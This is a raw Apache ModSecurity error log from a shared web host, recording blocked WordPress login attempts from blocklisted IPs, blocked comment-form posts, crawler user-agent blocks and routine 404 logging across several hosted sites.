[Tue May 26 18:22:27.515869 2026] [security2:error] [pid 983082:tid 983302] [client 57.141.2.54:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWXirvhpIlZJOtze4tP2wAAAN8"]
[Tue May 26 18:22:30.115874 2026] [security2:error] [pid 983082:tid 983275] [client 57.141.2.30:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWXjLvhpIlZJOtze4tQBgAAAMQ"]
[Tue May 26 18:22:30.175645 2026] [security2:error] [pid 983082:tid 983131] [remote 165.22.95.96:47076] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 96.95.22.165.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWXjbvhpIlZJOtze4tQIAAAsjA"]
[Tue May 26 18:22:32.669677 2026] [security2:error] [pid 983082:tid 983315] [client 57.141.2.2:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWXj7vhpIlZJOtze4tQOwAAAOw"]
[Tue May 26 18:22:35.269064 2026] [security2:error] [pid 983082:tid 983255] [client 57.141.2.57:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWXkbvhpIlZJOtze4tQZwAAALA"]
[Tue May 26 18:22:37.897242 2026] [security2:error] [pid 983082:tid 983247] [client 57.141.2.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWXlLvhpIlZJOtze4tQmQAAAKg"]
[Tue May 26 18:22:38.828809 2026] [security2:error] [pid 983082:tid 983246] [client 74.7.244.49:59798] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "www.tekne.cagmedya.com"] [uri "/robots.txt"] [unique_id "ahWXlrvhpIlZJOtze4tQxgAApz0"]
[Tue May 26 18:22:40.467538 2026] [security2:error] [pid 983082:tid 983329] [client 57.141.2.40:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWXlrvhpIlZJOtze4tQzQAAAPo"]
[Tue May 26 18:22:42.053901 2026] [security2:error] [pid 983082:tid 983147] [remote 222.165.190.235:45986] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.190.165.222.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "obinnawrites.com"] [uri "/wp-login.php"] [unique_id "ahWXmbvhpIlZJOtze4tRBQAAnEA"]
[Tue May 26 18:22:43.586600 2026] [security2:error] [pid 983082:tid 983282] [client 57.141.2.61:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWXmrvhpIlZJOtze4tRDAAAAMs"]
[Tue May 26 18:22:45.503990 2026] [security2:error] [pid 983082:tid 983234] [client 57.141.2.6:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWXm7vhpIlZJOtze4tRLQAAAJs"]
[Tue May 26 18:22:45.984223 2026] [security2:error] [pid 983082:tid 983165] [remote 222.165.190.235:45986] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.190.165.222.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "obinnawrites.com"] [uri "/wp-login.php"] [unique_id "ahWXnbvhpIlZJOtze4tRTwABAFI"], referer: https://obinnawrites.com/wp-login.php
[Tue May 26 18:22:46.029698 2026] [security2:error] [pid 983082:tid 983291] [client 45.151.139.13:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahWXnbvhpIlZJOtze4tRUgAAANQ"], referer: https://www.anujtradingco.com/
[Tue May 26 18:22:47.946768 2026] [security2:error] [pid 983082:tid 983293] [client 45.151.139.13:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWXn7vhpIlZJOtze4tRegAAANY"], referer: https://www.anujtradingco.com/pages/services-modern/?unapproved=1431741&moderation-hash=49c10c23b02da98e066105372b2c9381
[Tue May 26 18:22:48.186778 2026] [security2:error] [pid 983082:tid 983261] [client 57.141.2.30:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWXnrvhpIlZJOtze4tRZwAAALY"]
[Tue May 26 18:22:48.908079 2026] [security2:error] [pid 983082:tid 983231] [client 45.132.115.39:50117] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 39.115.132.45.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "pcc.co.me"] [uri "/wp-login.php"] [unique_id "ahWXoLvhpIlZJOtze4tRjQAAAJg"]
[Tue May 26 18:22:49.623891 2026] [security2:error] [pid 983082:tid 983323] [client 45.132.115.41:31569] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 41.115.132.45.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "pcc.co.me"] [uri "/wp-login.php"] [unique_id "ahWXobvhpIlZJOtze4tRngAAAPQ"]
[Tue May 26 18:22:49.958166 2026] [security2:error] [pid 983082:tid 983183] [remote 139.59.3.17:44324] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 17.3.59.139.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "avprealty.com"] [uri "/wp-login.php"] [unique_id "ahWXobvhpIlZJOtze4tRrAAAo2Q"]
[Tue May 26 18:22:50.062753 2026] [security2:error] [pid 983082:tid 983304] [client 57.141.2.10:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWXoLvhpIlZJOtze4tRkgAAAOE"]
[Tue May 26 18:22:50.245480 2026] [security2:error] [pid 983082:tid 983296] [client 45.132.115.39:53055] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 39.115.132.45.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "pcc.co.me"] [uri "/wp-login.php"] [unique_id "ahWXorvhpIlZJOtze4tRtgAAANk"]
[Tue May 26 18:22:50.774009 2026] [security2:error] [pid 983082:tid 983085] [remote 222.165.190.235:54984] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.190.165.222.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWXorvhpIlZJOtze4tRwQAA9QI"]
[Tue May 26 18:22:51.149090 2026] [security2:error] [pid 983082:tid 983214] [client 80.90.183.221:38523] ModSecurity: Access denied with code 406 (phase 1). RBL lookup of 221.183.90.80.csi.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1548"] [id "900927"] [msg "contact-form RBL block: csi.websitewelcome.com"] [hostname "moes-art.com"] [uri "/wp-comments-post.php"] [unique_id "ahWXorvhpIlZJOtze4tRyAAAAIc"]
[Tue May 26 18:22:51.218253 2026] [security2:error] [pid 983082:tid 983214] [client 80.90.183.221:38523] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "406"] [hostname "moes-art.com"] [uri "/wp-comments-post.php"] [unique_id "ahWXorvhpIlZJOtze4tRyAAAAIc"]
[Tue May 26 18:22:51.340587 2026] [security2:error] [pid 983082:tid 983203] [remote 222.165.190.235:54984] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.190.165.222.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWXo7vhpIlZJOtze4tR0gAA53g"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 18:22:53.285561 2026] [security2:error] [pid 983082:tid 983222] [client 57.141.2.65:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWXo7vhpIlZJOtze4tR2wAAAI8"]
[Tue May 26 18:22:54.017855 2026] [security2:error] [pid 983082:tid 983208] [remote 139.59.3.17:44324] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 17.3.59.139.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "avprealty.com"] [uri "/wp-login.php"] [unique_id "ahWXprvhpIlZJOtze4tSDgAAjX0"], referer: https://avprealty.com/wp-login.php
[Tue May 26 18:22:54.329263 2026] [security2:error] [pid 983082:tid 983285] [client 80.90.183.221:47893] ModSecurity: Access denied with code 406 (phase 1). RBL lookup of 221.183.90.80.csi.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1548"] [id "900927"] [msg "contact-form RBL block: csi.websitewelcome.com"] [hostname "moes-art.com"] [uri "/wp-comments-post.php"] [unique_id "ahWXprvhpIlZJOtze4tSGQAAAM4"]
[Tue May 26 18:22:54.418527 2026] [security2:error] [pid 983082:tid 983182] [remote 167.71.130.119:36374] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.130.71.167.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWXprvhpIlZJOtze4tSGAAApGM"]
[Tue May 26 18:22:54.574323 2026] [security2:error] [pid 983082:tid 983285] [client 80.90.183.221:47893] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "406"] [hostname "moes-art.com"] [uri "/wp-comments-post.php"] [unique_id "ahWXprvhpIlZJOtze4tSGQAAAM4"]
[Tue May 26 18:22:54.662959 2026] [autoindex:error] [pid 983082:tid 983284] [client 134.209.69.75:0] AH01276: Cannot serve directory /home2/glorolle/public_html/gldmarsa.com/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 18:22:55.508667 2026] [security2:error] [pid 983082:tid 983329] [client 57.141.2.20:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWXprvhpIlZJOtze4tSFwAAAPo"]
[Tue May 26 18:22:57.349830 2026] [security2:error] [pid 983082:tid 983260] [client 57.141.2.61:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWXqLvhpIlZJOtze4tSRQAAALU"]
[Tue May 26 18:22:57.570838 2026] [security2:error] [pid 983082:tid 983174] [remote 119.18.52.246:49064] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 246.52.18.119.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "taotechservices.com"] [uri "/wp-login.php"] [unique_id "ahWXqbvhpIlZJOtze4tSWQAAnFs"]
[Tue May 26 18:22:57.957718 2026] [security2:error] [pid 983082:tid 983313] [client 80.90.183.221:42123] ModSecurity: Access denied with code 406 (phase 1). RBL lookup of 221.183.90.80.csi.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1548"] [id "900927"] [msg "contact-form RBL block: csi.websitewelcome.com"] [hostname "moes-art.com"] [uri "/wp-comments-post.php"] [unique_id "ahWXqbvhpIlZJOtze4tSaAAAAOo"]
[Tue May 26 18:22:58.197799 2026] [security2:error] [pid 983082:tid 983313] [client 80.90.183.221:42123] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "406"] [hostname "moes-art.com"] [uri "/wp-comments-post.php"] [unique_id "ahWXqbvhpIlZJOtze4tSaAAAAOo"]
[Tue May 26 18:22:58.389053 2026] [security2:error] [pid 983082:tid 983253] [client 185.191.171.11:34302] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/tag/glow/day/2026-05-16/"] [unique_id "ahWXqrvhpIlZJOtze4tScAAAAK4"]
[Tue May 26 18:22:58.389214 2026] [security2:error] [pid 983082:tid 983253] [client 185.191.171.11:34302] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/tag/glow/day/2026-05-16/"] [unique_id "ahWXqrvhpIlZJOtze4tScAAAAK4"]
[Tue May 26 18:22:59.332385 2026] [security2:error] [pid 983082:tid 983306] [client 45.151.139.13:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWXq7vhpIlZJOtze4tShAAAAOM"], referer: https://anujtradingco.com
[Tue May 26 18:23:00.710118 2026] [security2:error] [pid 983082:tid 983332] [client 57.141.2.7:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWXq7vhpIlZJOtze4tSigAAAP0"]
[Tue May 26 18:23:00.824196 2026] [security2:error] [pid 983082:tid 983239] [client 80.90.183.221:37699] ModSecurity: Access denied with code 406 (phase 1). RBL lookup of 221.183.90.80.csi.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1548"] [id "900927"] [msg "contact-form RBL block: csi.websitewelcome.com"] [hostname "moes-art.com"] [uri "/wp-comments-post.php"] [unique_id "ahWXrLvhpIlZJOtze4tSoQAAAKA"]
[Tue May 26 18:23:01.064805 2026] [security2:error] [pid 983082:tid 983239] [client 80.90.183.221:37699] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "406"] [hostname "moes-art.com"] [uri "/wp-comments-post.php"] [unique_id "ahWXrLvhpIlZJOtze4tSoQAAAKA"]
[Tue May 26 18:23:02.294574 2026] [security2:error] [pid 983082:tid 983204] [remote 91.227.122.219:49962] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 219.122.227.91.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "kurgu-afrika.com"] [uri "/wp-login.php"] [unique_id "ahWXrrvhpIlZJOtze4tSygAA_3k"]
[Tue May 26 18:23:02.967703 2026] [security2:error] [pid 983082:tid 983220] [client 57.141.2.11:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWXrbvhpIlZJOtze4tSwwAAAI0"]
[Tue May 26 18:23:03.012516 2026] [security2:error] [pid 983082:tid 983311] [client 80.90.183.221:39373] ModSecurity: Access denied with code 406 (phase 1). RBL lookup of 221.183.90.80.csi.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1548"] [id "900927"] [msg "contact-form RBL block: csi.websitewelcome.com"] [hostname "moes-art.com"] [uri "/wp-comments-post.php"] [unique_id "ahWXr7vhpIlZJOtze4tS4QAAAOg"]
[Tue May 26 18:23:03.257779 2026] [security2:error] [pid 983082:tid 983311] [client 80.90.183.221:39373] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "406"] [hostname "moes-art.com"] [uri "/wp-comments-post.php"] [unique_id "ahWXr7vhpIlZJOtze4tS4QAAAOg"]
[Tue May 26 18:23:04.781314 2026] [security2:error] [pid 983082:tid 983323] [client 106.222.227.47:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "samayikprasanga.in"] [uri "/epaper.php"] [unique_id "ahWXsLvhpIlZJOtze4tTAQAAAPQ"]
[Tue May 26 18:23:04.781775 2026] [security2:error] [pid 983082:tid 983231] [client 106.222.227.47:23494] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "samayikprasanga.in"] [uri "/epaper.php"] [unique_id "ahWXsLvhpIlZJOtze4tS_AAAAJg"]
[Tue May 26 18:23:04.911528 2026] [security2:error] [pid 983082:tid 983305] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWXr7vhpIlZJOtze4tS7gAAAOI"]
[Tue May 26 18:23:05.081642 2026] [security2:error] [pid 983082:tid 983223] [client 80.90.183.221:49647] ModSecurity: Access denied with code 406 (phase 1). RBL lookup of 221.183.90.80.csi.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1548"] [id "900927"] [msg "contact-form RBL block: csi.websitewelcome.com"] [hostname "moes-art.com"] [uri "/wp-comments-post.php"] [unique_id "ahWXsbvhpIlZJOtze4tTCAAAAJA"]
[Tue May 26 18:23:05.349834 2026] [security2:error] [pid 983082:tid 983223] [client 80.90.183.221:49647] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "406"] [hostname "moes-art.com"] [uri "/wp-comments-post.php"] [unique_id "ahWXsbvhpIlZJOtze4tTCAAAAJA"]
[Tue May 26 18:23:07.388602 2026] [security2:error] [pid 983082:tid 983338] [client 80.90.183.221:44371] ModSecurity: Access denied with code 406 (phase 1). RBL lookup of 221.183.90.80.csi.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1548"] [id "900927"] [msg "contact-form RBL block: csi.websitewelcome.com"] [hostname "moes-art.com"] [uri "/wp-comments-post.php"] [unique_id "ahWXs7vhpIlZJOtze4tTPAAAAQM"]
[Tue May 26 18:23:07.638344 2026] [security2:error] [pid 983082:tid 983338] [client 80.90.183.221:44371] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "406"] [hostname "moes-art.com"] [uri "/wp-comments-post.php"] [unique_id "ahWXs7vhpIlZJOtze4tTPAAAAQM"]
[Tue May 26 18:23:08.535140 2026] [security2:error] [pid 983082:tid 983221] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWXsrvhpIlZJOtze4tTMwAAAI4"]
[Tue May 26 18:23:09.352114 2026] [security2:error] [pid 983082:tid 983099] [remote 74.91.224.220:42850] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 220.224.91.74.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWXtbvhpIlZJOtze4tTYAAA1hA"]
[Tue May 26 18:23:09.727117 2026] [security2:error] [pid 983082:tid 983217] [client 98.84.150.207:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWXtbvhpIlZJOtze4tTcAAAAIo"]
[Tue May 26 18:23:09.815561 2026] [security2:error] [pid 983082:tid 983201] [remote 74.91.224.220:42850] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 220.224.91.74.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWXtbvhpIlZJOtze4tTcQAA_HY"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 18:23:09.952337 2026] [security2:error] [pid 983082:tid 983244] [client 114.119.137.95:34487] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.senoro.com.mx"] [uri "/servicios/"] [unique_id "ahWXtbvhpIlZJOtze4tTeQAAAKU"], referer: http://www.senoro.com.mx/solicitud-de-informacion
[Tue May 26 18:23:09.978688 2026] [security2:error] [pid 983082:tid 983221] [client 80.90.183.221:55721] ModSecurity: Access denied with code 406 (phase 1). RBL lookup of 221.183.90.80.csi.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1548"] [id "900927"] [msg "contact-form RBL block: csi.websitewelcome.com"] [hostname "moes-art.com"] [uri "/wp-comments-post.php"] [unique_id "ahWXtbvhpIlZJOtze4tTfgAAAI4"]
[Tue May 26 18:23:09.983599 2026] [security2:error] [pid 983082:tid 983268] [client 98.84.150.207:57140] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWXtbvhpIlZJOtze4tTdgAAvR4"]
[Tue May 26 18:23:10.191274 2026] [security2:error] [pid 983082:tid 983230] [client 57.141.2.33:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWXtLvhpIlZJOtze4tTVAAAAJc"]
[Tue May 26 18:23:10.236813 2026] [security2:error] [pid 983082:tid 983221] [client 80.90.183.221:55721] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "406"] [hostname "moes-art.com"] [uri "/wp-comments-post.php"] [unique_id "ahWXtbvhpIlZJOtze4tTfgAAAI4"]
[Tue May 26 18:23:11.425554 2026] [security2:error] [pid 983082:tid 983116] [remote 222.165.190.235:45704] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.190.165.222.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "canopykaapi.com"] [uri "/wp-login.php"] [unique_id "ahWXt7vhpIlZJOtze4tTmwAA7iE"]
[Tue May 26 18:23:12.607828 2026] [security2:error] [pid 983082:tid 983277] [client 80.90.183.221:44895] ModSecurity: Access denied with code 406 (phase 1). RBL lookup of 221.183.90.80.csi.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1548"] [id "900927"] [msg "contact-form RBL block: csi.websitewelcome.com"] [hostname "moes-art.com"] [uri "/wp-comments-post.php"] [unique_id "ahWXuLvhpIlZJOtze4tTvQAAAMY"]
[Tue May 26 18:23:12.850793 2026] [security2:error] [pid 983082:tid 983277] [client 80.90.183.221:44895] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "406"] [hostname "moes-art.com"] [uri "/wp-comments-post.php"] [unique_id "ahWXuLvhpIlZJOtze4tTvQAAAMY"]
